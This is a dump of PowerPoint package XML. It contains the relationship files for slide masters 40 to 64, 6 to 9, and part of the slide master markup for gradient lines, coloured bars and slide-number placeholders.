<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme40.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag206.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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag204.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag203.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout41.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster41.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme41.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag210.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09.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag208.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag207.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout42.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster42.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme42.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag21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13.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag212.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag211.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout43.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster43.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme43.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag21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17.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag216.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag215.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout44.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster44.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme44.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag22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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag220.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag219.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout45.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster45.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme45.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag22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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag224.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag223.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout46.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster46.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme46.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag23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29.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag228.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag227.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout47.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster47.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme47.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag23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slideLayout" Target="../slideLayouts/slideLayout48.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster48.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme48.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag23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37.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag236.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag235.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout49.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster49.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme49.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag24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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag240.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag239.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout50.xml"/></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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag24.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.svg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag23.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag22.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag21.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout6.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster50.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme50.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag24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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag244.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag243.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout51.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster51.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme51.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag25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49.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag248.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag247.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout52.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster52.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme52.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag25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53.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag252.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag251.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout53.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster53.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme53.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag25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57.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag256.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag255.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout54.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster54.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme54.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag26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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag260.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag259.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster55.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme55.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag26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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag264.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag263.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout56.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster56.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme56.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag27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69.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag268.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag267.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout57.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster57.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme57.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag27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73.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag272.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag271.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout58.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster58.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme58.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag27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77.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag276.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag275.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout59.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster59.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme59.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag28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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag280.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag279.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout60.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster6.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag30.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag29.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag28.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27.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag26.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag25.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme6.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout7.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster60.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme60.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag286.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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag284.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag283.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout61.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster61.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme61.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag290.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89.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag288.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag287.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout62.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster62.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme62.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag294.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93.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag292.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag291.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout63.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster63.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme63.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag298.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297.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag296.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag295.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout64.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster64.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme64.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag302.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.svg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag301.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag300.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag299.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout65.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster7.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag36.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag35.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag34.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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag32.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag31.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme7.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout8.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster8.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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme8.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout9.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster9.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag48.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag47.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag46.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.svg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme9.xml"/><Relationship Id="rId1"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7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1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1"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0.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8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5.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98"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70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0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53"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0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1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8.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4"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9.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6"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3"/>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4"/>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5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6" cstate="print">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId7"/>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8"/>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9"/>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10"/>
    </p:custDataLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147483655" r:id="rId1"/>
    <p:sldLayoutId id="2147483656" r:id="rId2"/>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0.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2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0"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732"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3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07A7A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8"/>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07A7AF"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="47000">
                  <a:srgbClr val="07A7AF">
                    <a:alpha val="30000"/>
                  </a:srgbClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="0"/>
              <a:tileRect/>
            </a:gradFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="灯片编号占位符 10"/>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fld id="{8FBB60E3-B36B-43A6-B31C-E7226B1077ED}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147483658" r:id="rId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4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5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6.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7.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8.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9.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0"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0.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68"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0"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2"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4"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 name="矩形 21"/>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23" name="矩形 22"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="0" y="6572250"/>
            <a:ext cx="12192000" cy="285750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1202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25" name="图形 2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26" name="直接连接符 25"/>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D1202F"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="47000">
                  <a:srgbClr val="C00000">
                    <a:alpha val="30000"/>
                  </a:srgbClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="0"/>
              <a:tileRect/>
            </a:gradFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="灯片编号占位符 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11347200" y="6076800"/>
            <a:ext cx="828000" cy="360000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
